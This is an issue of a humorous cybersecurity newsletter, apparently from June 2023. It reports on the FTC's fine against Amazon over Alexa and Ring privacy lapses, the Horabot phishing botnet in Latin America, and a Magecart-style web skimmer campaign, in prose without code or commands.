Amazon fined $30m for perving on 55k customers.

Jun 05 2023

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that does for cybersecurity what Mizzy’s done for the argument for censorship ????

Today’s hottest cyber security stories:

  • Amazon fined $30m for perving on 55k customers via Ring & Alexa

  • Horabot botnet sweeps Latin America

  • WooCommerce, Magneto, WordPress, and Shopify hit by Web Skimmer


The U.S. Federal Trade Commission (FTC) has slapped Amazon with a whopping $30.8 million in fines! Apparently, Amazon had some serious privacy lapses when it comes to their Alexa assistant and those Ring security cameras.

Now, let's break it down. The FTC threw a $25 million penalty at Amazon for breaking the rules when it comes to kids' privacy.

It turns out they were keeping these little voices recorded by Alexa for an indefinite period of time. Parents couldn't even delete them!

The FTC's Samuel Levine had some strong words, saying Amazon was all about sacrificing privacy for profits. Ouch!

In addition to that hefty fine, Amazon has been ordered to clean up its act. They have to delete all that collected information, including the inactive child accounts, geolocation data, and those embarrassing voice recordings.

Oh, and they can't go snooping around and gathering that kind of data to train their clever algorithms anymore. Time to spill the beans on their data retention practices too! They’re putting Amazon in the sin bin, for sure. Serves them right!

And here comes the cherry on top: Amazon will be digging deep into their pockets to the tune of an extra $5.8 million in consumer refunds.

Why, you ask? Well, it seems like they played fast and loose with access to private videos recorded by those Ring cameras. Turns out, any employee or contractor could peek at those intimate spaces in people's homes. Can you believe it?

One employee had a field day watching thousands of videos belonging to female users in the bathroom and bedroom! It took another employee to finally catch them in the act. Gross.

So, yeah. Amazon got a major slap on the wrist from the FTC, and it's safe to say they won't be getting any gold stars for their privacy practices.

Let's hope they've learned their lesson and won't make us the stars of their creepy video voyeur show.

Stay vigilant, and keep those bathroom and bedroom cameras unplugged!


First thing’s first: what do you call a Mexican who’s lost his car? Carlos! ???? Sorry, don’t cancel us. Back to the story…

Hold on to your sombreros, folks! Spanish-speaking users in Latin America have found themselves in a bit of a pickle (jalapeño?) thanks to the infamous malware known as Horabot. It's like a villain straight out of a telenovela, causing chaos since November 2020!

According to our cyber-sleuth, Cisco Talos researcher Chetan Raghuprasad, Horabot gives the bad guys full control over the victim's Outlook mailbox.

Not only can they snoop around and steal email addresses from unsuspecting contacts, but they can also send phishing emails with sneaky HTML attachments to everyone in the victim's inbox, turning your inbox into a fiesta of malicious mayhem!

This mischievous botnet doesn't stop there. It also unleashes a financial trojan on Windows-based systems and even comes equipped with a spam tool.

The bad guys want to get their hands on those precious online banking credentials, and they won't hesitate to compromise Gmail, Outlook, and Yahoo! webmail accounts just to bombard the world with spam emails.

Apparently, this party-crashing malware has been having a fiesta primarily in Mexico.

But also our amigos in Uruguay, Brazil, Venezuela, Argentina, Guatemala, and Panama have had a taste of its unwanted attention. The sneaky mastermind behind this chaos is believed to be hiding somewhere in Brazil.

So, how does the chaos begin, you ask? Well, it all starts with phishing emails that lure victims with tax-themed tricks. They tempt you to open an HTML attachment, which is like opening Pandora's box of trouble.

Inside, you'll find a link that leads to a sneaky RAR archive. Open that, and voila! A PowerShell downloader script comes to life, retrieving a ZIP file with all the nasty payloads from a remote server.

And just to make things more interesting, your machine decides to take a siesta and restart itself. Isn't that thoughtful?

But wait, there's a twist! This reboot isn't just an ordinary restart. It's like the malware's way of saying, "Hold my tequila!" As your system wakes up, it becomes the launching pad for the banking trojan and spam tool.

So, amigos, be on high alert! Horabot is out there, ready to crash your inbox and make a mess of things. Keep those antivirus tools handy, double-check those suspicious emails, and remember to never click on anything that looks fishier than a taco without guacamole.


Uh-oh, a group of cybersecurity researchers has discovered a fresh and active web skimmer campaign, reminiscent of the dreaded Magecart attacks, aimed at pilfering personally identifiable information (PII) and credit card details from e-commerce websites.

What sets this campaign apart from previous Magecart incidents is its utilisation of compromised websites as "makeshift" command-and-control (C2) servers.

This clever and dastardly tactic allows the attackers to distribute malicious code discreetly, without the knowledge of the victimised websites.

Akamai, a web security company, has reported identifying victims of various sizes across North America, Latin America, and Europe. As a result, the personal data of thousands of website visitors is now at risk of being harvested and traded for illicit profits.

Damn, sorry to start the week off on such a downer but hey, perhaps tomorrow will bring some good news. And honestly, Amazon getting fined $30m for snooping is sort of good news, right?

Stay safe, people!

So long and thanks for reading all the phish!

Recent articles